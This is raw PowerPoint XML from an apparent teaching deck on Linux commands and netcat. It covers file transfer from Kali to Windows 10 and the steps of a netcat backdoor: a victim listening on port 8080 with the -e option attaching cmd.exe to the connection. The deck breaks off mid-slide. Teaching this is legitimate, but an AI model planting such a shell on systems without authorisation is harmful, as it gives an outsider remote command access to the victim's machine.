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0"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId31"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="373" r:id="rId3"/>
    <p:sldId id="444" r:id="rId4"/>
    <p:sldId id="446" r:id="rId5"/>
    <p:sldId id="448" r:id="rId6"/>
    <p:sldId id="447" r:id="rId7"/>
    <p:sldId id="449" r:id="rId8"/>
    <p:sldId id="445" r:id="rId9"/>
    <p:sldId id="450" r:id="rId10"/>
    <p:sldId id="452" r:id="rId11"/>
    <p:sldId id="455" r:id="rId12"/>
    <p:sldId id="456" r:id="rId13"/>
    <p:sldId id="453" r:id="rId14"/>
    <p:sldId id="454" r:id="rId15"/>
    <p:sldId id="457" r:id="rId16"/>
    <p:sldId id="459" r:id="rId17"/>
    <p:sldId id="458" r:id="rId18"/>
    <p:sldId id="460" r:id="rId19"/>
    <p:sldId id="461" r:id="rId20"/>
    <p:sldId id="462" r:id="rId21"/>
    <p:sldId id="463" r:id="rId22"/>
    <p:sldId id="464" r:id="rId23"/>
    <p:sldId id="466" r:id="rId24"/>
    <p:sldId id="465" r:id="rId25"/>
    <p:sldId id="467" r:id="rId26"/>
    <p:sldId id="468" r:id="rId27"/>
    <p:sldId id="469" r:id="rId28"/>
    <p:sldId id="428" r:id="rId29"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Adobe Devanagari" panose="02040503050201020203" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
      <p:italic r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
      <p:regular r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>
      <p:italic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Sniglet" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Dosis" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId40"/>
      <p:bold r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Helvetica" panose="020B0604020202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444"/>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3/29/2020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4767264"/>
            <a:ext cx="2057400" cy="273844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D786C765-F843-4CE9-B389-075D89EB78BB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/29/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326352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97597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33478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60" r:id="rId3"/>
    <p:sldLayoutId id="2147483662" r:id="rId4"/>
    <p:sldLayoutId id="214748366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hyperlink" Target="http://www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computerhope.com/unix/nc.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.brianstorti.com/understanding-shell-script-idiom-redirec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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Advanced Linux Commands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Transfer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="747925" y="1364171"/>
            <a:ext cx="6715156" cy="2780232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31161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Your work</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0" y="4722813"/>
            <a:ext cx="549275" cy="393700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393379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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Send files from Kali to Windows 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Zenmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is integrated into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Zenmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321100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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="568256" y="790277"/>
            <a:ext cx="7694236" cy="3572625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2427580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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Bent-Up Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5211454" y="2515153"/>
            <a:ext cx="776253" cy="8486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770012" y="3550164"/>
            <a:ext cx="3801005" cy="819264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="4799439" cy="3105013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15622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backdoor at Window 10</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0" y="4722813"/>
            <a:ext cx="549275" cy="393700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103559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Backdoor background</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="518479" y="2498702"/>
            <a:ext cx="6933259" cy="1280665"/>
            <a:chOff x="1220568" y="5449115"/>
            <a:chExt cx="16789969" cy="3719928"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="pasted-image.tif"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1220568" y="6319169"/>
              <a:ext cx="2050617" cy="2050617"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 201"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4531580" y="5705018"/>
              <a:ext cx="2210115" cy="1112535"/>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2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" dirty="0"/>
                <a:t>std input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 202"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4550624" y="7663240"/>
              <a:ext cx="2233407" cy="1023138"/>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2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400"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67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 204"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3321689" y="7804900"/>
              <a:ext cx="1079942" cy="355834"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="Picture 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579816" y="6023612"/>
              <a:ext cx="5434477" cy="101603"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 32"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="6463892"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Picture 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="7937137"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Picture 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>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7" name="Shape 214"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="12117936" y="7804899"/>
              <a:ext cx="838107" cy="523630"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Shape 215"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8298014" y="6294553"/>
              <a:ext cx="2390972"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9" name="Shape 216"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8233576" y="8233479"/>
              <a:ext cx="2519848"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40" name="Shape 217"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8901674" y="5449115"/>
              <a:ext cx="569604" cy="526580"/>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dirty="0" err="1"/>
                <a:t>tcp</a:t>
              </a:r>
              <a:endParaRPr sz="2533" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Shape 218"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9012255" y="8642463"/>
              <a:ext cx="569604" cy="526580"/>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a:t>tcp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Shape 219"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13351926" y="6095010"/>
              <a:ext cx="3841633" cy="1112535"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" dirty="0" smtClean="0"/>
                <a:t>puts </a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600" dirty="0"/>
                <a:t>input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Shape 220"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13246136" y="7266129"/>
              <a:ext cx="4764401" cy="1112535"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" dirty="0" smtClean="0"/>
                <a:t>receive</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                <a:t> output</a:t>
              </a:r>
              <a:endParaRPr sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7256813" y="2779099"/>
            <a:ext cx="1017874" cy="653136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581185" y="3541811"/>
            <a:ext cx="641739" cy="506125"/>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200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7350303" y="3506829"/>
            <a:ext cx="830894" cy="506125"/>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sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="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833" y="1135844"/>
            <a:ext cx="742539" cy="742539"/>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170958" y="1507114"/>
            <a:ext cx="2514875"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1185" y="1489141"/>
            <a:ext cx="2325165" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Let a victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to a hidden communication channel (backdoor)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5845441" y="1357407"/>
            <a:ext cx="2349732" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a signal to activate the communication channel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="Straight Arrow Connector 52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4454981" y="1507114"/>
            <a:ext cx="3084644"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85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561" y="512749"/>
            <a:ext cx="3362794" cy="828791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64561" y="1443726"/>
            <a:ext cx="3124747" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server listens port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: program to execute after connection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>occures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>., connecting STDIN and STDOUT to the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
